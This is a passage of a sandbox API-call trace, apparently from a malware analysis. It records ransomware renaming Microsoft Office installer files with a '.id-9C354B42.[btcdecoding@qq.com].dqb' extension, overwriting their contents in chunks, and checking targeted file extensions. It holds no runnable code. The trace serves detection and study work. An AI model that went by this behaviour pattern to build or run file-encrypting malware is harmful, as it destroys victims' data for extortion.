[0032.954] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.965] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0032.965] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0032.966] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0032.966] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0032.966] ReadFile (in: hFile=0x180, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0032.973] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0032.973] ReadFile (in: hFile=0x180, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0032.984] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0032.985] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0032.985] ReadFile (in: hFile=0x180, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.221] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.221] WriteFile (in: hFile=0x180, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0033.237] SetEndOfFile (hFile=0x180) returned 1 [0033.237] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0033.337] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0033.337] WriteFile (in: hFile=0x180, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0033.338] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0033.338] WriteFile (in: hFile=0x180, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0033.343] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0033.343] WriteFile (in: hFile=0x180, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0033.346] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0033.346] CloseHandle (hObject=0x180) returned 1 [0034.089] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.089] lstrlenW (lpString=".doc") returned 4 [0034.089] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.089] lstrlenW (lpString=".docx") returned 5 [0034.089] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.089] lstrlenW (lpString=".pdf") returned 4 [0034.089] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.089] lstrlenW (lpString=".xls") returned 4 [0034.089] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.089] lstrlenW (lpString=".xlsx") returned 5 [0034.089] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.089] lstrlenW (lpString=".ppt") returned 4 [0034.089] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.089] lstrlenW (lpString=".zip") returned 4 [0034.089] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.089] lstrlenW (lpString=".rar") returned 4 [0034.089] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString=".bz2") returned 4 [0034.090] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString=".7z") returned 3 [0034.090] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString=".dbf") returned 4 [0034.090] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString=".1cd") returned 4 [0034.090] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString=".jpg") returned 4 [0034.090] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString=".doc") returned 4 [0034.090] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString=".docx") returned 5 [0034.090] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.090] lstrlenW (lpString=".pdf") returned 4 [0034.090] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString=".xls") returned 4 [0034.090] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString=".xlsx") returned 5 [0034.090] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.090] lstrlenW (lpString=".ppt") returned 4 [0034.090] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.090] lstrlenW (lpString=".zip") returned 4 [0034.090] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString=".rar") returned 4 [0034.090] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.090] lstrlenW (lpString=".bz2") returned 4 [0034.090] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.090] lstrlenW (lpString=".7z") returned 3 [0034.090] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.091] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.091] lstrlenW (lpString=".dbf") returned 4 [0034.091] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.091] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.091] lstrlenW (lpString=".1cd") returned 4 [0034.091] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.091] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.091] lstrlenW (lpString=".jpg") returned 4 [0034.091] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.091] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0034.091] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0034.091] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.223] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=2513920) returned 1 [0034.223] CloseHandle (hObject=0x178) returned 1 [0034.225] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0034.225] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.225] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0034.226] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.226] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0034.226] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.226] ReadFile (in: hFile=0x178, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.238] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.238] ReadFile (in: hFile=0x178, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.254] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0034.254] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.254] ReadFile (in: hFile=0x178, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.294] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.294] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc010c, lpOverlapped=0x0) returned 1 [0034.656] SetEndOfFile (hFile=0x178) returned 1 [0034.656] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0034.656] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.656] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.658] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.658] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.663] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.663] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.666] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0034.666] CloseHandle (hObject=0x178) returned 1 [0035.117] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString=".doc") returned 4 [0035.118] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0035.118] lstrlenW (lpString=".docx") returned 5 [0035.118] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0035.118] lstrlenW (lpString=".pdf") returned 4 [0035.118] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0035.118] lstrlenW (lpString=".xls") returned 4 [0035.118] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0035.118] lstrlenW (lpString=".xlsx") returned 5 [0035.118] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0035.118] lstrlenW (lpString=".ppt") returned 4 [0035.118] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString=".zip") returned 4 [0035.118] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0035.118] lstrlenW (lpString=".rar") returned 4 [0035.118] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0035.118] lstrlenW (lpString=".bz2") returned 4 [0035.118] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0035.118] lstrlenW (lpString=".7z") returned 3 [0035.118] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString=".dbf") returned 4 [0035.118] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString=".1cd") returned 4 [0035.118] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0035.118] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.118] lstrlenW (lpString=".jpg") returned 4 [0035.118] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString=".doc") returned 4 [0035.119] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0035.119] lstrlenW (lpString=".docx") returned 5 [0035.119] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0035.119] lstrlenW (lpString=".pdf") returned 4 [0035.119] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0035.119] lstrlenW (lpString=".xls") returned 4 [0035.119] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0035.119] lstrlenW (lpString=".xlsx") returned 5 [0035.119] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0035.119] lstrlenW (lpString=".ppt") returned 4 [0035.119] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString=".zip") returned 4 [0035.119] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0035.119] lstrlenW (lpString=".rar") returned 4 [0035.119] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0035.119] lstrlenW (lpString=".bz2") returned 4 [0035.119] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0035.119] lstrlenW (lpString=".7z") returned 3 [0035.119] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString=".dbf") returned 4 [0035.119] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString=".1cd") returned 4 [0035.119] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0035.119] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0035.119] lstrlenW (lpString=".jpg") returned 4 [0035.119] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0035.120] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0035.120] lstrlenW (lpString="OutlkLR.cab") returned 11 [0035.120] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.121] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=14819276) returned 1 [0035.121] CloseHandle (hObject=0x178) returned 1 [0035.121] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0035.121] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.121] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0035.122] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.122] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.122] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.122] ReadFile (in: hFile=0x178, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.171] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.171] ReadFile (in: hFile=0x178, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.237] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.237] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.237] ReadFile (in: hFile=0x178, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.268] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.268] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0035.283] SetEndOfFile (hFile=0x178) returned 1 [0035.283] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0035.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.287] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.288] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.288] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.289] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.289] WriteFile (in: hFile=0x178, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.290] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0035.290] CloseHandle (hObject=0x178) returned 1 [0038.540] SetFileAttributesW 